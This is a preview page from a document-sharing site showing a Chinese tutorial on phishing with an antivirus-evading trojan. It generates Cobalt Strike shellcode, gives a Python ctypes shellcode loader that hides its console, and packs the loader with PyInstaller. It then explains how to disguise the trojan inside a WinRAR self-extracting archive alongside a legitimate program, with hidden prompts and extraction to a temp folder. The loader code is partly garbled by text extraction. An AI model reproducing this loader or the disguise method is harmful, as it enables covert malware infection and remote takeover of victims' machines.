记一次钓鱼思路分享 作者mature_W_第1页
记一次钓鱼思路分享 作者mature_W_第2页
记一次钓鱼思路分享 作者mature_W_第3页
记一次钓鱼思路分享 作者mature_W_第4页
记一次钓鱼思路分享 作者mature_W_第5页
已阅读5页,还剩12页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、记一次钓鱼思路分享 作者:Mature原文链接:/s/SFS-qgplnnObEQRKWCWa4w本文由 干货 收集整理:/test/index.php前些天看文章学到的,分享给大家! 还有大家平时下载东西一定要到官方网站下载,不要随意打开别人发你的exe或其他可执行文件!一、制作一个免杀马:我们直接使用cs或者msfvenom生成payload杀软肯定会直接杀,所以我们可以利用这俩个工具生成一段shellcode.然后自己写一个加载器,最后再利用该语言的特性将其编译成exe. 这里我以python为例:1、利用

2、cs生成shellcode:(1) 首先建立一个器:Cobalt Strike-Listeners出现下图画面:17然后点击Add添加,端口和名字自己写一个,注意端口不要被占用 (2) 生成payload:然后出现payload生成类型以及 器选择:这里我们用python,如果目标机器是64位的可以勾选Use x64 payload,32位的默认即可(64位系统能兼容大部分32位的软件,所以64位的机器也可以不使用x64 payload)(3) 然后点击Generate,后会生成一个py脚本,内容如下:2、在我们的攻击机上安装好Pyinstaller3、利用python的Pyinstaller

3、将以下脚本打包成exe:from ctypes import * import ctypes# length: 891 bytes buf = xxx#libc = CDLL(libc.so.6) PROT_READ = 1PROT_WRITE = 2PROT_EXEC = 4def executable_code(buffer): buf = c_char_p(buffer) size = len(buffer)addr = libc.valloc(size) addr = c_void_p(addr)(1) 将我们生成的shellcode替换掉即可(也就是将buf = xxx替换成刚刚生成

4、的那串)if 0 = addr:raise Exception(Failed to allocate memory) memmove(addr, buf, size)if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC): raise Exception(Failed to set protection on buffer)return addrVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc VirtualProtect = ctypes.wi

5、ndll.kernel32.VirtualProtect shellcode = bytearray(buf)whnd = ctypes.windll.kernel32.GetConsoleWindow() if whnd != 0:if 666=666:ctypes.windll.user32.ShowWindow(whnd, 0) ctypes.windll.kernel32.CloseHandle(whnd)print *666memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_in

6、t(len(shellcode), ctypes.c_int(0x3000), ctypes.c_int(0x40)buf = (ctypes.c_char * len(shellcode).from_buffer(shellcode) old = ctypes.c_long(1)VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode),0x40,ctypes.byref(old) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),buf, ctyp

7、es.c_int(len(shellcode)shell = cast(memorywithshell, CFUNCTYPE(c_void_p) shell()(2) 进入到pyinstaller所在目录(默认安装后在Scripts目录下),然后运行:参数解释:/weixin_39000819/article/details/80942423包进该exe内)-F:输出为单个文件(会把所有的第三方依赖、资源和代码均-i:指定图标 -w:隐藏控制台 pyinstaller参数可参考:运行后等待结束会在dist目录下生成一个exe文件(就是我们打包好的免杀马)

8、:生成的exe:世界杀毒网检测效果:4、运行效果:运行后什么也不显示,但是我们这边已经成功上线了.可以看到是相当隐蔽的. 这 个 免 杀 是 参 考 以 下 文 章 的 : /webstudy/penetration/22.html二、将我们的免杀马和其他程序结合起来:再结合下winrar的自解压会更不容易让人发现:1、将我们刚刚生成的马和我们想要的正常exe一起添加到压缩包中(我这里用winrar举例,其他压缩软件也有此功能):选择创建自解压格式 2、然后选择 高级 下的自解压选项,3、相关的设置:(1) 设置自解压的路径(最好选择一个任意用户都有权限访问的目录):我这里就用:C:WindowsTemp(2) 设置木马正常程序的运行先后顺序:因为解压后我们的保存到我们设置的目录,所以这里的路径要对应.(3) 设置是否显示自解压提示:选择全部隐藏后,运行该自解压文件后会不显示自解压提示直接解压,比较隐蔽!(4) 设置更新:这里设置主要是为了防止目标路径下存在相同文件.(5) 设置生成自解压文件的图标:然后点击确定后即可生成.(6) 生成的自解压文件与正

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论